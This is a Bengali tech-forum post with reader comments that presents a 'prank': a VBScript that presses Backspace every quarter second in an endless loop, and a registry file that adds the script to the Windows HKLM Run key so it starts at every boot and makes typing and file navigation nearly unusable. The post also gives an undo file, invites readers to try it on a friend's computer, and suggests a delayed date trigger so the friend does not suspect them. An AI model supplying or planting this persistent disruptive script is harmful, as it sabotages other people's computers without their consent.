আসুন একটু মজা করি

সবাইকে শুভেচ্ছা।
শুধু মজা করার জন্যে আপনারা এই টিউনটি অনুশীলন করতে পারেন।
তবে মনে রাখবেন, বিড়ালের জন্য যা মজা, ইঁদুরের জন্য তা জীবন-মরন সমস্যা।
তেমনিভাবে আপনার মজা অন্যের জন্য মহাবিপদও হতে পারে। সুতরাং যা করবেন নিজ দায়িত্বে বুজে-শুনে করবেন।
আসুন, শুরু করা যাক।

1) Notepad ওপেন করুন।
নীচের কোডটুকু লিখুন অথবা এখান থেকে কপি করে পেস্ট করুন।

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 250
wshshell.sendkeys "{BACKSPACE}"
loop

(বিঃ দ্রঃ - এই কোড এবং নীচের প্রতিটি কোড নোটপ্যাডে পেস্ট করার পর " চিহ্নগুলোকে অবশ্যই ডাবল ইনভার্টেট কমায় রূপান্তর করবেন।)

উক্ত ফাইলটিকে StartAction.vbs নাম দিয়ে C: ড্রাইভে Save করুন।

2) আবার Notepad ওপেন করুন।
নীচের কোডটুকু লিখুন অথবা এখান থেকে কপি করে পেস্ট করুন।

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Script"="C:\StartAction.vbs"

(বিঃ দ্রঃ - নোটপ্যাড এ কোড পেস্ট করার পর ” চিহ্নগুলোকে অবশ্যই ডাবল ইনভার্টেড কমায় রূপান্তর করবেন।)

উক্ত ফাইলটিকে যে কোন নামে reg এক্সেনশান দিয়ে Save করুন (যেমন StartAction.reg)।

নোটপ্যাড বন্ধ করে উক্ত reg ফাইলটিতে ডাবল ক্লিক করে যথাক্রমে Yes ও Ok করুন।

এবার কম্পিউটার Restart করুন।

কম্পিউটার পূণঃরায় চালু হলে,
* একটি নতুন ফোল্ডার/ফাইল তৈরী করার চেষ্টা করুন।
* নোটপ্যাড, এম এস ওয়ার্ড বা যে কোন প্রোগ্রামে ঢুকে কিছু টাইপ করার চেষ্টা করুন।
* My Computer ওপেন করে বিভিন্ন ড্রাইভ/ফোল্ডার ওপেন করার চেষ্টা করুন।

আর দেখুন মজা।

এখানে বলে রাখা ভাল, এই মজায় আপনি একবার পড়ে গেলে উদ্ধার পাওয়া খুব কষ্টকর হবে। কিন্তু আপনাকেতো আমি বিপদে ফেলতে পারি না। সুতরাং উদ্ধার পাওয়ার উপায়টিও বলে দেই।

Notepad ওপেন করুন।
নীচের কোডটুকু লিখুন অথবা এখান থেকে কপি করে পেস্ট করুন।

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Script"=""

উক্ত ফাইলটিকে যে কোন নামে reg এক্সেনশান দিয়ে Save করুন (যেমন StopAction.reg)।

বিপদে পড়ার পর এই ফাইলটি আপনি তৈরী করতে পারবেন না। সুতরাং আগেই তৈরী করে রাখুন।

যখন বিপদে পড়ে যাবেন তখন এই (StopAction.reg) ফাইলটিতে ডাবল ক্লিক করে যথাক্রমে Yes ও Ok করুন।
তারপর কম্পিউটার Restart করুন।

দেখবেন বিপদ দূর হয়ে গেছে।

আমি জানি এটি জানার পর কারো কারো মাথায় হয়ত দুষ্টু বুদ্ধি আসবে যে, বন্ধুর কম্পিউটারে এটি প্রয়োগ করে মজা করবেন। হ্যাঁ, করতে পারেন। তবে তাকে বিপদে পেলে শুধু মজা করলেই হবে না, উদ্ধারও করতে হবে আপনাকে। কিন্তু একটা সমস্যা হলো, বন্ধু যখন বুঝবে আপনি তার কম্পিউটার ব্যবহারের পর থেকে এ সমস্যা দেখা দিয়েছে, তখন হয়ত সে আপনাকে সন্দেহ করবে। সে ক্ষেত্রে আপনি নির্দিষ্ট তারিখ বা দিন সেট করে দিতে পারেন, যাতে ঐটি সে দিনই কার্যকর হয়। তবে সে টেকনিক এখানে আলোচনা করলাম না। আপনারা প্রয়োজন মনে করলে এই টিউনের মন্তব্যে অথবা অন্য টিউনে সে বিষয়ে আলোচনা করা যাবে।

ভাল থাকুন সবাই।

Level 0

আমি Thinker। বিশ্বের সর্ববৃহৎ বিজ্ঞান ও প্রযুক্তির সৌশল নেটওয়ার্ক - টেকটিউনস এ আমি 15 বছর 5 মাস যাবৎ যুক্ত আছি। টেকটিউনস আমি এ পর্যন্ত 3 টি টিউন ও 14 টি টিউমেন্ট করেছি। টেকটিউনসে আমার 0 ফলোয়ার আছে এবং আমি টেকটিউনসে 0 টিউনারকে ফলো করি।


টিউনস


আরও টিউনস


টিউনারের আরও টিউনস


টিউমেন্টস

Level 0

Thinker ভাই,
আপনার টিউনটা মজার তবে, তারিখ সেট করার কায়দাটি গোপন করার মানে বুঝলাম না! আমাদেরকে জানাবেনই যখন তো পুরটাই জানানো কি ভালো না? আমার মনে হয় এতে টিউনের মান খারাপ হয়।

Level New

জটিল তো। থ্যাংক্স।

বুঝলাম তাই দেখলাম না।

Level 0

” বুঝলাম তাই দেখলাম না। ”

হা হা হা ………… শাকিল ভাইয়ের কমেন্টটা দারুন মজা লাগল। কি জন্য লাগল বুঝলাম না। হা হাহা

দেখলাম……. আপনার রেজিস্ট্রি এন্ট্রিতে ছোট্ট একটু ভুল আছে…. সেটা নাই বলা ভাল কারণ যারা এক্সপার্ট তারা সেটা ঠিকই বুঝবে….. 😉

Level 0

ভাই কো সমস্যা হলে তো ঐ reg file delete করে দিব। হি হি হি

Level 0

ভাই কোন সমস্যা হলে তো ঐ reg file delete করে দিব। হি হি হি